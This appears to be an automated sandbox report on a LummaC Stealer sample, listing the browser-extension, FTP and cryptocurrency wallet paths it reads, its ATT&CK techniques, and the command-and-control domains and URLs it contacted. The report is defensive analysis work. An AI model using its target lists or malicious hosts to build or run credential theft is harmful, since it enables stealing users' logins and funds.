Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Appliance.com	Binary or memory string: WIN_81
Source: Appliance.com	Binary or memory string: WIN_XP
Source: Appliance.com.1.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Appliance.com	Binary or memory string: WIN_XPe
Source: Appliance.com	Binary or memory string: WIN_VISTA
Source: Appliance.com	Binary or memory string: WIN_7
Source: Appliance.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match

File source: Process Memory Space: Appliance.com PID: 4504, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Appliance.com PID: 4504, type: MEMORYSTR
Source: Yara match	File source: 10.2.Appliance.com.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E42263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		10_2_00E42263
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E41C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		10_2_00E41C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	36 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HouseholdsClicking.exe	69%	Virustotal		Browse
HouseholdsClicking.exe	61%	ReversingLabs	Win32.Exploit.LummaC

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\19152\Appliance.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPK	100%	Avira URL Cloud	malware
http://store.steamp	0%	Avira URL Cloud	safe
https://sputnik-1985.com/api/	100%	Avira URL Cloud	malware
https://community.fastl	0%	Avira URL Cloud	safe
https://community.fastlyVG7	0%	Avira URL Cloud	safe
https://sputnik-1985.com/Wn3	100%	Avira URL Cloud	malware
https://sordid-snaked.cyou:443/api	100%	Avira URL Cloud	malware
https://sputnik-1985.com:443/api	100%	Avira URL Cloud	malware
https://sputnik-1985.com/Cj9F	100%	Avira URL Cloud	malware
https://sputnik-1985.com/api#bq	100%	Avira URL Cloud	malware
https://store.s	0%	Avira URL Cloud	safe
https://sputnik-1985.com/shqK	100%	Avira URL Cloud	malware
https://sputnik-1985.com/%e	100%	Avira URL Cloud	malware
https://sputnik-1985.com/)g	100%	Avira URL Cloud	malware
https://sputnik-1985.com/Y	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.64.1	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
aGpUaEJqSGxZhd.aGpUaEJqSGxZhd	unknown	unknown	true	unknown
awake-weaves.cyou	unknown	unknown	false	high
immureprech.biz	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
ingreem-eilish.biz	unknown	unknown	false	high
deafeninggeh.biz	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
deafeninggeh.biz	false	high
diffuculttan.xyz	false	high
effecterectz.xyz	false	high
wrathful-jammy.cyou	false	high
https://sputnik-1985.com/api	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
awake-weaves.cyou	false	high
immureprech.biz	false	high
debonairnukk.xyz	false	high
ingreem-eilish.biz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastlyVG7	Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steamp	Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sordid-snaked.cyou:443/api	Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	false		high
https://sputnik-1985.com/api#bq	Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/api/	Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/Wn3	Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Appliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sputnik-1985.com:443/api	Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPK	Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/Cj9F	Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastl	Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.s	Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://notepad-plus-plus.org/0	HouseholdsClicking.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/shqK	Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Appliance.com, 0000000A.00000000.1780609584.0000000000E95000.00000002.00000001.01000000.00000007.sdmp, Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Replacing.0.dr, Appliance.com.1.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	HouseholdsClicking.exe	false		high
https://www.ecosia.org/newtab/	Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://effecterectz.xyz/api	Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/	Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2114472331.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Appliance.com, 0000000A.00000003.2036753349.0000000004437000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/%e	Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/)g	Appliance.com, 0000000A.00000002.2115264331.0000000004335000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/Y	Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Appliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false
104.21.64.1	sputnik-1985.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587455
Start date and time:	2025-01-10 12:04:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HouseholdsClicking.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/21@12/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 72 Number of non-executed functions: 310
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:05:54	API Interceptor	1x Sleep call for process: HouseholdsClicking.exe modified
06:06:21	API Interceptor	10x Sleep call for process: Appliance.com modified
11:05:44	Task Scheduler	Run new task: {AD1E9D9F-126C-4E70-8AF2-E5B4693A998C} path: .

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm
104.21.64.1	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sputnik-1985.com	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
steamcommunity.com	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
